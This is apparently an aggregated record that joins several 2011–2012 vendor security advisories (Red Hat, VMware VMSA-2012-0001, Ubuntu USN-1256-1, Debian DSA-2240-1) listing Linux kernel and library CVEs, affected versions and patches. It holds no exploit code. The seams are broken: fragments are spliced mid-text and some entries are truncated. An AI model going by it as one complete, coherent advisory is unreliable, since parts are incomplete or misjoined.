.6.18-238.12.1.el5.x86_64.rpm\nkernel-devel-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-headers-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-xen-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-xen-debuginfo-2.6.18-238.12.1.el5.x86_64.rpm\nkernel-xen-devel-2.6.18-238.12.1.el5.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and \ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/#package\n\n7. Contact:\n\nThe Red Hat security contact is \u0026lt;secalert@redhat.com\u0026gt;.  More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n ----------------------------------------------------------------------\n                   VMware Security Advisory\n\nAdvisory ID: VMSA-2012-0001\nSynopsis:    VMware ESXi and ESX updates to third party library\n             and ESX Service Console\nIssue date:  2012-01-30\nUpdated on:  2012-01-30 (initial advisory)\n\nCVE numbers: --- COS Kernel ---\n             CVE-2011-0726, CVE-2011-1078, CVE-2011-1079,\n             CVE-2011-1080, CVE-2011-1093, CVE-2011-1163,\n             CVE-2011-1166, CVE-2011-1170, CVE-2011-1171,\n             CVE-2011-1172, CVE-2011-1494, CVE-2011-1495,\n             CVE-2011-1577, CVE-2011-1763, CVE-2010-4649,\n             CVE-2011-0695, CVE-2011-0711, CVE-2011-1044,\n             CVE-2011-1182, CVE-2011-1573, CVE-2011-1576,\n             CVE-2011-1593, CVE-2011-1745, CVE-2011-1746,\n             CVE-2011-1776, CVE-2011-1936, CVE-2011-2022,\n             CVE-2011-2213, CVE-2011-2492, CVE-2011-1780,\n             CVE-2011-2525, CVE-2011-2689, CVE-2011-2482,\n             CVE-2011-2491, CVE-2011-2495, CVE-2011-2517,\n             CVE-2011-2519, CVE-2011-2901\n             --- COS cURL ---\n             CVE-2011-2192\n             --- COS rpm ---\n             CVE-2010-2059, CVE-2011-3378\n             --- COS samba ---\n             CVE-2010-0547, CVE-2010-0787, CVE-2011-1678,\n             CVE-2011-2522, CVE-2011-2694\n             --- COS python ---\n             CVE-2009-3720, CVE-2010-3493, CVE-2011-1015,\n             CVE-2011-1521\n             --- python library ---\n             CVE-2009-3560, CVE-2009-3720, CVE-2010-1634,\n             CVE-2010-2089, CVE-2011-1521\n ----------------------------------------------------------------------\n\n1. Summary\n\n   VMware ESXi and ESX updates to third party library and ESX Service\n   Console address several security issues. \n\n2. Relevant releases\n\n   ESXi 4.1 without patch ESXi410-201201401-SG\n\n   ESX 4.1 without patches ESX410-201201401-SG, ESX410-201201402-SG,\n                           ESX410-201201404-SG, ESX410-201201405-SG,\n                           ESX410-201201406-SG, ESX410-201201407-SG\n\n3. Problem Description\n\n a. ESX third party update for Service Console kernel\n\n    The ESX Service Console Operating System (COS) kernel is updated to\n    kernel-2.6.18-274.3.1.el5 to fix multiple security issues in the\n    COS kernel. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201401-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n  * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n b. ESX third party update for Service Console cURL RPM\n\n    The ESX Service Console (COS) curl RPM is updated to cURL-7.15.5.9\n    resolving a security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201402-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n c. ESX third party update for Service Console nspr and nss RPMs\n\n    The ESX Service Console (COS) nspr and nss RPMs are updated to\n    nspr-4.8.8-1.el5_7 and nss-3.12.10-4.el5_7 respectively resolving\n    a security issues. \n\n    A Certificate Authority (CA) issued fraudulent SSL certificates and\n    Netscape Portable Runtime (NSPR) and Network Security Services (NSS)\n    contain the built-in tokens of this fraudulent Certificate\n    Authority. This update renders all SSL certificates signed by the\n    fraudulent CA as untrusted for all uses. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201404-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n d. ESX third party update for Service Console rpm RPMs\n\n    The ESX Service Console Operating System (COS) rpm packages are\n    updated to popt-1.10.2.3-22.el5_7.2, rpm-4.4.2.3-22.el5_7.2,\n    rpm-libs-4.4.2.3-22.el5_7.2 and rpm-python-4.4.2.3-22.el5_7.2\n    which fixes multiple security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201406-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n e. ESX third party update for Service Console samba RPMs\n\n    The ESX Service Console Operating System (COS) samba packages are\n    updated to samba-client-3.0.33-3.29.el5_7.4,\n    samba-common-3.0.33-3.29.el5_7.4 and\n    libsmbclient-3.0.33-3.29.el5_7.4 which fixes multiple security\n    issues in the Samba client. \n\n    Note that ESX does not include the Samba Web Administration Tool\n    (SWAT) and therefore ESX COS is not affected by CVE-2011-2522 and\n    CVE-2011-2694. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201407-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n f. ESX third party update for Service Console python package\n\n    The ESX Service Console (COS) python package is updated to\n    2.4.3-44 which fixes multiple security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           any       ESXi     not affected\n\n    ESX            4.1       ESX      ESX410-201201405-SG\n    ESX            4.0       ESX      patch pending\n    ESX            3.5       ESX      not applicable\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n g. ESXi update to third party component python\n\n    The python third party library is updated to python 2.5.6 which\n    fixes multiple security issues. \n\n    Column 4 of the following table lists the action required to\n    remediate the vulnerability in each release, if a solution is\n    available. \n\n    VMware         Product   Running  Replace with/\n    Product        Version   on       Apply Patch\n    =============  ========  =======  =================\n    vCenter        any       Windows  not affected\n\n    hosted *       any       any      not affected\n\n    ESXi           5.0       ESXi     patch pending\n    ESXi           4.1       ESXi     ESXi410-201201401-SG\n    ESXi           4.0       ESXi     patch pending\n    ESXi           3.5       ESXi     patch pending\n\n    ESX            4.1       ESX      not affected\n    ESX            4.0       ESX      not affected\n    ESX            3.5       ESX      not affected\n\n    * hosted products are VMware Workstation, Player, ACE, Fusion. \n\n\n4. Solution\n\n   Please review the patch/release notes for your product and version\n   and verify the checksum of your downloaded file. \n\n   VMware ESXi 4.1\n   ---------------\n   ESXi410-201201401\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: BDF86F10A973346E26C9C2CD4C424E88    \n   sha1sum: CC0B92869A9AAE4F5E0E5B81BEE109BCD7DA780F\n   http://kb.vmware.com/kb/2009143\n   ESXi410-201201401 contains ESXi410-201201401-SG\n\n   VMware ESX 4.1\n   --------------\n   ESX410-201201001\n   http://downloads.vmware.com/go/selfsupport-download\n   md5sum: 16DF9ACD3E74BCABC2494BC23AD0927F    \n   sha1sum: 1066AE1436E1A75BA3D541AB65296CFB9AB7A5CC\n   http://kb.vmware.com/kb/2009142\n\n   ESX410-201201001 contains ESX410-201201401-SG, ESX410-201201402-SG,\n   ESX410-201201404-SG, ESX410-201201405-SG, ESX410-201201406-SG and\n   ESX410-201201407-SG\n\n5. References\n\n   CVE numbers\n\n   --- COS Kernel ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0726\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1078\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1079\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1080\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1093\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1163\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1166\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1170\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1171\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1172\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1494\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1577\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1763\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4649\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0695\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0711\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1044\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1182\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1573\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1576\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1593\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1745\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1746\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1776\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1936\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2022\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2213\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2492\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1780\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2525\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2689\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2482\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2491\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2495\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2517\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2519\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2901\n   --- COS cURL ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2192\n   --- COS rpm ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2059\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3378\n   --- COS samba ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0547\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0787\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1678\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2522\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2694\n   --- COS python ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3493\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1015\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n   --- python library ---\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3560\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3720\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1634\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2089\n   http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1521\n\n ----------------------------------------------------------------------\n\n6. Change log\n\n   2012-01-30 VMSA-2012-0001\n   Initial security advisory in conjunction with the release of patches\n   for ESX 4.1 and ESXi 4.1 on 2012-01-30. \n\n ----------------------------------------------------------------------\n\n7. Contact\n\nE-mail list for product security notifications and announcements:\nhttp://lists.vmware.com/cgi-bin/mailman/listinfo/security-announce\n\nThis Security Advisory is posted to the following lists:\n\n  * security-announce at lists.vmware.com\n  * bugtraq at securityfocus.com\n  * full-disclosure at lists.grok.org.uk\n\nE-mail:  security at vmware.com\nPGP key at: http://kb.vmware.com/kb/1055\n\nVMware Security Advisories\nhttp://www.vmware.com/security/advisories\n\nVMware security response policy\nhttp://www.vmware.com/support/policies/security_response.html\n\nGeneral support life cycle policy\nhttp://www.vmware.com/support/policies/eos.html\n\nVMware Infrastructure support life cycle policy\nhttp://www.vmware.com/support/policies/eos_vi.html\n\nCopyright 2012 VMware Inc.  All rights reserved. \n\n-----BEGIN PGP SIGNATURE-----\nVersion: PGP Desktop 9.8.3 (Build 4028)\nCharset: utf-8\n\nwj8DBQFPJ5DIDEcm8Vbi9kMRAnzCAKCmaAoDp49d61Mr1emzh/U0N8vbgACdFZk8\nf2pLxi537s+ew4dvnYNWlJ8=\n=OAh4\n-----END PGP SIGNATURE-----\n. ==========================================================================\nUbuntu Security Notice USN-1256-1\nNovember 09, 2011\n\nlinux-lts-backport-natty vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 10.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux-lts-backport-natty: Linux kernel backport from Natty\n\nDetails:\n\nIt was discovered that the /proc filesystem did not correctly handle\npermission changes when programs executed. A local attacker could hold open\nfiles to examine details about programs running with higher privileges,\npotentially increasing the chances of exploiting additional\nvulnerabilities. (CVE-2011-1020)\n\nVasiliy Kulikov discovered that the Bluetooth stack did not correctly clear\nmemory. A local attacker could exploit this to read kernel stack memory,\nleading to a loss of privacy. (CVE-2011-1078)\n\nVasiliy Kulikov discovered that the Bluetooth stack did not correctly check\nthat device name strings were NULL terminated. A local attacker could\nexploit this to crash the system, leading to a denial of service, or leak\ncontents of kernel stack memory, leading to a loss of privacy. \n(CVE-2011-1079)\n\nVasiliy Kulikov discovered that bridge network filtering did not check that\nname fields were NULL terminated. A local attacker could exploit this to\nleak contents of kernel stack memory, leading to a loss of privacy. \n(CVE-2011-1080)\n\nJohan Hovold discovered that the DCCP network stack did not correctly\nhandle certain packet combinations. A remote attacker could send specially\ncrafted network traffic that would crash the system, leading to a denial of\nservice. (CVE-2011-1093)\n\nPeter Huewe discovered that the TPM device did not correctly initialize\nmemory. A local attacker could exploit this to read kernel heap memory\ncontents, leading to a loss of privacy. (CVE-2011-1160)\n\nDan Rosenberg discovered that the IRDA subsystem did not correctly check\ncertain field sizes. If a system was using IRDA, a remote attacker could\nsend specially crafted traffic to crash the system or gain root privileges. \n(CVE-2011-1180)\n\nRyan Sweat discovered that the GRO code did not correctly validate memory. \nIn some configurations on systems using VLANs, a remote attacker could send\nspecially crafted traffic to crash the system, leading to a denial of\nservice. (CVE-2011-1478)\n\nIt was discovered that the security fix for CVE-2010-4250 introduced a\nregression. A remote attacker could exploit this to crash the system,\nleading to a denial of service. (CVE-2011-1479)\n\nDan Rosenberg discovered that the X.25 Rose network stack did not correctly\nhandle certain fields. If a system was running with Rose enabled, a remote\nattacker could send specially crafted traffic to gain root privileges. \n(CVE-2011-1493)\n\nIt was discovered that the Stream Control Transmission Protocol (SCTP)\nimplementation incorrectly calculated lengths. If the net.sctp.addip_enable\nvariable was turned on, a remote attacker could send specially crafted\ntraffic to crash the system. (CVE-2011-1573)\n\nRyan Sweat discovered that the kernel incorrectly handled certain VLAN\npackets. On some systems, a remote attacker could send specially crafted\ntraffic to crash the system, leading to a denial of service. \n(CVE-2011-1576)\n\nTimo Warns discovered that the GUID partition parsing routines did not\ncorrectly validate certain structures. A local attacker with physical\naccess could plug in a specially crafted block device to crash the system,\nleading to a denial of service. (CVE-2011-1577)\n\nPhil Oester discovered that the network bonding system did not correctly\nhandle large queues. On some systems, a remote attacker could send\nspecially crafted traffic to crash the system, leading to a denial of\nservice. (CVE-2011-1581)\n\nIt was discovered that CIFS incorrectly handled authentication. When a user\nhad a CIFS share mounted that required authentication, a local user could\nmount the same share without knowing the correct password. (CVE-2011-1585)\n\nIt was discovered that the GRE protocol incorrectly handled netns\ninitialization. A remote attacker could send a packet while the ip_gre\nmodule was loading, and crash the system, leading to a denial of service. \n(CVE-2011-1767)\n\nIt was discovered that the IP/IP protocol incorrectly handled netns\ninitialization. A remote attacker could send a packet while the ipip module\nwas loading, and crash the system, leading to a denial of service. \n(CVE-2011-1768)\n\nBen Greear discovered that CIFS did not correctly handle direct I/O. A\nlocal attacker with access to a CIFS partition could exploit this to crash\nthe system, leading to a denial of service. (CVE-2011-1771)\n\nTimo Warns discovered that the EFI GUID partition table was not correctly\nparsed. A physically local attacker that could insert mountable devices\ncould exploit this to crash the system or possibly gain root privileges. \n(CVE-2011-1776)\n\nVasiliy Kulikov and Dan Rosenberg discovered that ecryptfs did not\ncorrectly check the origin of mount points. A local attacker could exploit\nthis to trick the system into unmounting arbitrary mount points, leading to\na denial of service. (CVE-2011-1833)\n\nAndrea Righi discovered a race condition in the KSM memory merging support. \nIf KSM was being used, a local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2011-2183)\n\nDan Rosenberg discovered that the IPv4 diagnostic routines did not\ncorrectly validate certain requests. A local attacker could exploit this to\nconsume CPU resources, leading to a denial of service. (CVE-2011-2213)\n\nIt was discovered that an mmap() call with the MAP_PRIVATE flag on\n\"/dev/zero\" was incorrectly handled. A local attacker could exploit this to\ncrash the system, leading to a denial of service. (CVE-2011-2479)\n\nVasiliy Kulikov discovered that taskstats listeners were not correctly\nhandled. A local attacker could expoit this to exhaust memory and CPU\nresources, leading to a denial of service. (CVE-2011-2484)\n\nVasily Averin discovered that the NFS Lock Manager (NLM) incorrectly\nhandled unlock requests. A local attacker could exploit this to cause a\ndenial of service. (CVE-2011-2491)\n\nIt was discovered that Bluetooth l2cap and rfcomm did not correctly\ninitialize structures. A local attacker could exploit this to read portions\nof the kernel stack, leading to a loss of privacy. (CVE-2011-2492)\n\nSami Liedes discovered that ext4 did not correctly handle missing root\ninodes. A local attacker could trigger the mount of a specially crafted\nfilesystem to cause the system to crash, leading to a denial of service. \n(CVE-2011-2493)\n\nVasiliy Kulikov discovered that taskstats did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2494)\n\nVasiliy Kulikov discovered that /proc/PID/io did not enforce access\nrestrictions. A local attacker could exploit this to read certain\ninformation, leading to a loss of privacy. (CVE-2011-2495)\n\nRobert Swiecki discovered that mapping extensions were incorrectly handled. \nA local attacker could exploit this to crash the system, leading to a\ndenial of service. (CVE-2011-2496)\n\nDan Rosenberg discovered that the Bluetooth stack incorrectly handled\ncertain L2CAP requests. If a system was using Bluetooth, a remote attacker\ncould send specially crafted traffic to crash the system or gain root\nprivileges. (CVE-2011-2497)\n\nIt was discovered that the wireless stack incorrectly verified SSID\nlengths. A local attacker could exploit this to cause a denial of service\nor gain root privileges. (CVE-2011-2517)\n\nBen Pfaff discovered that Classless Queuing Disciplines (qdiscs) were being\nincorrectly handled. A local attacker could exploit this to crash the\nsystem, leading to a denial of service. (CVE-2011-2525)\n\nIt was discovered that GFS2 did not correctly check block sizes. A local\nattacker could exploit this to crash the system, leading to a denial of\nservice. (CVE-2011-2689)\n\nIt was discovered that the EXT4 filesystem contained multiple off-by-one\nflaws. A local attacker could exploit this to crash the system, leading to\na denial of service. (CVE-2011-2695)\n\nFernando Gont discovered that the IPv6 stack used predictable fragment\nidentification numbers. A remote attacker could exploit this to exhaust\nnetwork resources, leading to a denial of service. (CVE-2011-2699)\n\nMauro Carvalho Chehab discovered that the si4713 radio driver did not\ncorrectly check the length of memory copies. If this hardware was\navailable, a local attacker could exploit this to crash the system or gain\nroot privileges. (CVE-2011-2700)\n\nHerbert Xu discovered that certain fields were incorrectly handled when\nGeneric Receive Offload (CVE-2011-2723)\n\nChristian Ohm discovered that the perf command looks for configuration\nfiles in the current directory. If a privileged user were tricked into\nrunning perf in a directory containing a malicious configuration file, an\nattacker could run arbitrary commands and possibly gain privileges. \n(CVE-2011-2905)\n\nVasiliy Kulikov discovered that the Comedi driver did not correctly clear\nmemory. A local attacker could exploit this to read kernel stack memory,\nleading to a loss of privacy. (CVE-2011-2909)\n\nThe performance counter subsystem did not correctly handle certain\ncounters. A local attacker could exploit this to crash the system, leading\nto a denial of service. (CVE-2011-2918)\n\nTime Warns discovered that long symlinks were incorrectly handled on Be\nfilesystems. A local attacker could exploit this with a malformed Be\nfilesystem and crash the system, leading to a denial of service. \n(CVE-2011-2928)\n\nQianfeng Zhang discovered that the bridge networking interface incorrectly\nhandled certain network packets. A remote attacker could exploit this to\ncrash the system, leading to a denial of service. (CVE-2011-2942)\n\nDan Kaminsky discovered that the kernel incorrectly handled random sequence\nnumber generation. An attacker could use this flaw to possibly predict\nsequence numbers and inject packets. (CVE-2011-3188)\n\nDarren Lavender discovered that the CIFS client incorrectly handled certain\nlarge values. \n(CVE-2011-3191)\n\nYasuaki Ishimatsu discovered a flaw in the kernel\u0027s clock implementation. A\nlocal unprivileged attacker could exploit this causing a denial of service. \n(CVE-2011-3209)\n\nYogesh Sharma discovered that CIFS did not correctly handle UNCs that had\nno prefixpaths. A local attacker with access to a CIFS partition could\nexploit this to crash the system, leading to a denial of service. \n(CVE-2011-3363)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 10.04 LTS:\n  linux-image-2.6.38-12-generic   2.6.38-12.51~lucid1\n  linux-image-2.6.38-12-generic-pae  2.6.38-12.51~lucid1\n  linux-image-2.6.38-12-server    2.6.38-12.51~lucid1\n  linux-image-2.6.38-12-virtual   2.6.38-12.51~lucid1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If\nyou use linux-restricted-modules, you have to update that package as\nwell to get modules which work with the new kernel version. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well. \n\nReferences:\n  http://www.ubuntu.com/usn/usn-1256-1\n  CVE-2011-1020, CVE-2011-1078, CVE-2011-1079, CVE-2011-1080,\n  CVE-2011-1093, CVE-2011-1160, CVE-2011-1180, CVE-2011-1478,\n  CVE-2011-1479, CVE-2011-1493, CVE-2011-1573, CVE-2011-1576,\n  CVE-2011-1577, CVE-2011-1581, CVE-2011-1585, CVE-2011-1767,\n  CVE-2011-1768, CVE-2011-1771, CVE-2011-1776, CVE-2011-1833,\n  CVE-2011-2183, CVE-2011-2213, CVE-2011-2479, CVE-2011-2484,\n  CVE-2011-2491, CVE-2011-2492, CVE-2011-2493, CVE-2011-2494,\n  CVE-2011-2495, CVE-2011-2496, CVE-2011-2497, CVE-2011-2517,\n  CVE-2011-2525, CVE-2011-2689, CVE-2011-2695, CVE-2011-2699,\n  CVE-2011-2700, CVE-2011-2723, CVE-2011-2905, CVE-2011-2909,\n\nPackage Information:\n  https://launchpad.net/ubuntu/+source/linux-lts-backport-natty/2.6.38-12.51~lucid1\n\n\n. (CVE-2010-4242)\n\nBrad Spengler discovered that the kernel did not correctly account for\nuserspace memory allocations during exec() calls. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n- ----------------------------------------------------------------------\nDebian Security Advisory DSA-2240-1                security@debian.org\nhttp://www.debian.org/security/                           dann frazier\nMay 24, 2011                        http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage        : linux-2.6\nVulnerability  : privilege escalation/denial of service/information leak\nProblem type   : local/remote\nDebian-specific: no\nCVE Id(s)      : CVE-2010-3875 CVE-2011-0695 CVE-2011-0711 CVE-2011-0726\n                 CVE-2011-1016 CVE-2011-1078 CVE-2011-1079 CVE-2011-1080\n                 CVE-2011-1090 CVE-2011-1160 CVE-2011-1163 CVE-2011-1170\n                 CVE-2011-1171 CVE-2011-1172 CVE-2011-1173 CVE-2011-1180\n                 CVE-2011-1182 CVE-2011-1476 CVE-2011-1477 CVE-2011-1478\n                 CVE-2011-1493 CVE-2011-1494 CVE-2011-1495 CVE-2011-1585\n                 CVE-2011-1593 CVE-2011-1598 CVE-2011-1745 CVE-2011-1746\n                 CVE-2011-1748 CVE-2011-1759 CVE-2011-1767 CVE-2011-1770\n                 CVE-2011-1776 CVE-2011-2022\nDebian Bug(s)  : \n                 \nSeveral vulnerabilities have been discovered in the Linux kernel that may lead\nto a denial of service or privilege escalation. The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2010-3875\n\n    Vasiliy Kulikov discovered an issue in the Linux implementation of the\n    Amateur Radio AX.25 Level 2 protocol. \n\nCVE-2011-0695\n\n    Jens Kuehnel reported an issue in the InfiniBand stack. Local\n    users could learn the text location of a process, defeating protections\n    provided by address space layout randomization (ASLR). \n\nCVE-2011-1016\n\n    Marek Ol\u0161\u00e1k discovered an issue in the driver for ATI/AMD Radeon video\n    chips. Local users could pass arbitrary values to video memory and the\n    graphics translation table, resulting in denial of service or escalated\n    privileges. On default Debian installations, this is exploitable only by\n    members of the \u0027video\u0027 group. \n    \nCVE-2011-1080\n\n    Vasiliy Kulikov discovered an issue in the Netfilter subsystem. \n\nCVE-2011-1160\n\n    Peter Huewe reported an issue in the Linux kernel\u0027s support for TPM security\n    chips. \n\nCVE-2011-1163\n\n    Timo Warns reported an issue in the kernel support for Alpha OSF format disk\n    partitions. \n\nCVE-2011-1170\n\n    Vasiliy Kulikov reported an issue in the Netfilter arp table\n    implementation. \n\nCVE-2011-1171\n\n    Vasiliy Kulikov reported an issue in the Netfilter IP table\n    implementation. \n    \nCVE-2011-1172\n\n    Vasiliy Kulikov reported an issue in the Netfilter IP6 table\n    implementation. \n    \nCVE-2011-1173\n\n    Vasiliy Kulikov reported an issue in the Acorn Econet protocol\n    implementation. \n\nCVE-2011-1180\n\n    Dan Rosenberg reported a buffer overflow in the Information Access Service\n    of the IrDA protocol, used for Infrared devices. \n\nCVE-2011-1182\n\n    Julien Tinnes reported an issue in the rt_sigqueueinfo interface. Local\n    users can generate signals with falsified source pid and uid information. \n\nCVE-2011-1476\n\n    Dan Rosenberg reported issues in the Open Sound System MIDI interface that\n    allow local users to cause a denial of service. This issue does not affect\n    official Debian Linux image packages as they no longer provide support for\n    OSS.  However, custom kernels built from Debians linux-source-2.6.32 may\n    have enabled this configuration and would therefore be vulnerable. \n\nCVE-2011-1477\n\n    Dan Rosenberg reported issues in the Open Sound System driver for cards that\n    include a Yamaha FM synthesizer chip. This issue does not affect\n    official Debian Linux image packages as they no longer provide support for\n    OSS.  However, custom kernels built from Debians linux-source-2.6.32 may\n    have enabled this configuration and would therefore be vulnerable. \n\nCVE-2011-1478\n\n    Ryan Sweat reported an issue in the Generic Receive Offload (GRO) support in\n    the Linux networking subsystem. \n\nCVE-2011-1493\n\n    Dan Rosenburg reported two issues in the Linux implementation of the Amateur\n    Radio X.25 PLP (Rose) protocol. \n\nCVE-2011-1494\n\n    Dan Rosenberg reported an issue in the /dev/mpt2ctl interface provided by\n    the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian\n    installations this is not exploitable as this interface is only accessible\n    to root. \n\nCVE-2011-1495\n\n    Dan Rosenberg reported two additional issues in the /dev/mpt2ctl interface\n    provided by the driver for LSI MPT Fusion SAS 2.0 controllers. On default Debian installations this is not\n    exploitable as this interface is only accessible to root. \n\nCVE-2011-1585\n\n    Jeff Layton reported an issue in the Common Internet File System (CIFS). \n\nCVE-2011-1598\n\n    Dave Jones reported an issue in the Broadcast Manager Controller Area\n    Network (CAN/BCM) protocol that may allow local users to cause a NULL\n    pointer dereference, resulting in a denial of service. \n\nCVE-2011-1745\n\n    Vasiliy 